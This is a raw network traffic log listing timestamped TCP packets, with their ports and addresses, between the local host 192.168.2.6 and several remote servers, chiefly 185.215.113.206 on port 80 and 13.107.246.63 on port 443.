Nov 23, 2024 07:09:43.706762075 CET	49876	443	192.168.2.6	23.219.161.135
Nov 23, 2024 07:09:43.706970930 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.707735062 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.707803965 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.707833052 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.708000898 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.708074093 CET	49876	443	192.168.2.6	23.219.161.135
Nov 23, 2024 07:09:43.708132029 CET	443	49876	23.219.161.135	192.168.2.6
Nov 23, 2024 07:09:43.708496094 CET	49876	443	192.168.2.6	23.219.161.135
Nov 23, 2024 07:09:43.708502054 CET	443	49876	23.219.161.135	192.168.2.6
Nov 23, 2024 07:09:43.708856106 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.709044933 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.709106922 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.710038900 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.710115910 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.710158110 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.710300922 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.711163044 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.711322069 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.711371899 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.712330103 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.712346077 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.712393999 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.712431908 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.713428974 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.713478088 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.713520050 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.713622093 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.714556932 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.714610100 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.714679003 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.714845896 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.715378046 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.715428114 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.715468884 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.715482950 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.715508938 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.715682983 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.715694904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.715797901 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.715989113 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.716857910 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.716918945 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.716969967 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.717012882 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.717977047 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.718091965 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.718137980 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.719129086 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.719204903 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.719253063 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.720230103 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.720287085 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.720328093 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.720841885 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.721389055 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.721462965 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.721503973 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.721632004 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.722539902 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.722609043 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.722645998 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.722853899 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.723661900 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.723717928 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.723743916 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.723918915 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.724823952 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.724858046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.724925995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.725994110 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.726062059 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.726097107 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.726172924 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.726284981 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.726308107 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.726352930 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.726366997 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.726392984 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.727089882 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.727435112 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.727489948 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.727544069 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.728213072 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.728321075 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.728385925 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.729372978 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.729391098 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.729428053 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.729460001 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.730492115 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.730570078 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.730606079 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.730868101 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.731626034 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.731693029 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.731733084 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.731856108 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.732825041 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.732888937 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.732924938 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.733036995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.733988047 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.734113932 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.734152079 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.734164953 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.735049963 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.735115051 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.735140085 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.735236883 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.735253096 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.735332012 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.735367060 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.735382080 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.736188889 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.736248016 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.736258030 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.736279011 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.736519098 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.737313986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.737452030 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.737517118 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.738461971 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.738565922 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.738581896 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.738600969 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.739418030 CET	443	49863	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.739587069 CET	443	49863	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.739598036 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.739617109 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.739670992 CET	49863	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.739886045 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.740724087 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.740777969 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.740818024 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.740899086 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.741405010 CET	49863	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.741420984 CET	443	49863	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.741436005 CET	49863	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.741441965 CET	443	49863	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.741919041 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.741976976 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.742032051 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.742162943 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.742609024 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.742645025 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.742691994 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.742701054 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.742727041 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.742748022 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.743026972 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.743081093 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.743158102 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.743200064 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.743803978 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.743829966 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.744133949 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.744257927 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.744307995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.745527983 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.745546103 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.745601892 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.746413946 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.746526957 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.746674061 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.747584105 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.747622967 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.747687101 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.748678923 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.748805046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.748825073 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.748992920 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.749830008 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.749960899 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.750021935 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.753742933 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.753770113 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.753787041 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.753802061 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.753803968 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.753813028 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.753843069 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.753858089 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.753886938 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.753947020 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.756642103 CET	443	49865	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.756711960 CET	443	49865	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.756771088 CET	49865	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.773555994 CET	443	49867	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.773637056 CET	443	49867	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.773718119 CET	49867	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.780945063 CET	49865	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.780970097 CET	443	49865	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.780986071 CET	49865	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.780992985 CET	443	49865	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.782336950 CET	49867	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.782342911 CET	443	49867	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.782356024 CET	49867	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.782361031 CET	443	49867	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.787400007 CET	49884	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.787427902 CET	443	49884	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.787645102 CET	49884	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.788948059 CET	49884	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.788965940 CET	443	49884	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.790271044 CET	49885	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.790303946 CET	443	49885	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.790416956 CET	49885	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.790647984 CET	49885	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.790662050 CET	443	49885	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.791481972 CET	49886	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.791491985 CET	443	49886	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.791577101 CET	49886	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.791842937 CET	49886	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.791860104 CET	443	49886	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.793701887 CET	49876	443	192.168.2.6	23.219.161.135
Nov 23, 2024 07:09:43.826605082 CET	443	49877	23.209.72.40	192.168.2.6
Nov 23, 2024 07:09:43.831371069 CET	49877	443	192.168.2.6	23.209.72.40
Nov 23, 2024 07:09:43.831396103 CET	443	49877	23.209.72.40	192.168.2.6
Nov 23, 2024 07:09:43.832829952 CET	443	49877	23.209.72.40	192.168.2.6
Nov 23, 2024 07:09:43.832885981 CET	49877	443	192.168.2.6	23.209.72.40
Nov 23, 2024 07:09:43.833360910 CET	49877	443	192.168.2.6	23.209.72.40
Nov 23, 2024 07:09:43.833440065 CET	443	49877	23.209.72.40	192.168.2.6
Nov 23, 2024 07:09:43.890222073 CET	443	49874	2.16.158.35	192.168.2.6
Nov 23, 2024 07:09:43.890645027 CET	49874	443	192.168.2.6	2.16.158.35
Nov 23, 2024 07:09:43.890669107 CET	443	49874	2.16.158.35	192.168.2.6
Nov 23, 2024 07:09:43.891765118 CET	443	49874	2.16.158.35	192.168.2.6
Nov 23, 2024 07:09:43.891891956 CET	49874	443	192.168.2.6	2.16.158.35
Nov 23, 2024 07:09:43.892863989 CET	49874	443	192.168.2.6	2.16.158.35
Nov 23, 2024 07:09:43.892925978 CET	443	49874	2.16.158.35	192.168.2.6
Nov 23, 2024 07:09:43.895745993 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.895817995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.895863056 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.895939112 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.896297932 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.896424055 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.896430969 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.896482944 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.897475958 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.897526979 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.897530079 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.897562981 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.898612022 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.898679972 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.898699045 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.898746967 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.899736881 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.899795055 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.899852037 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.899894953 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.900844097 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.900892019 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.900958061 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.901000023 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.901988029 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.902034044 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.902074099 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.902331114 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.903119087 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.903172970 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.903274059 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.903352976 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.903776884 CET	443	49864	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.903840065 CET	443	49864	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.903903961 CET	49864	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.904226065 CET	49864	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.904226065 CET	49864	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.904242039 CET	443	49864	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.904251099 CET	443	49864	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.904267073 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.904326916 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.904386997 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.904439926 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.905400038 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.905446053 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.905477047 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.905569077 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.906544924 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.906593084 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.906635046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.906683922 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.907336950 CET	49887	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.907371998 CET	443	49887	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.907444954 CET	49887	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.907598019 CET	49887	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.907613039 CET	443	49887	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.907694101 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.907748938 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.907788992 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.907834053 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.908812046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.908888102 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.908951998 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.908991098 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.909945011 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.909997940 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.910044909 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.910089016 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.911154985 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.911232948 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.911262989 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.911349058 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.912245989 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.912309885 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.912345886 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.912698984 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.913350105 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.913412094 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.913449049 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.913563013 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.914501905 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.914544106 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.914611101 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.914653063 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.915657997 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.915744066 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.915793896 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.916769028 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.916883945 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.916935921 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.917903900 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.917963028 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.918003082 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.918070078 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.919065952 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.919193029 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.919244051 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.920207977 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.920257092 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.920289993 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.920401096 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.921354055 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.921452999 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.921477079 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.921487093 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.922467947 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.922521114 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.922559977 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.922785997 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.923604965 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.923657894 CET	49817	80	192.168.2.6	185.215.113.206
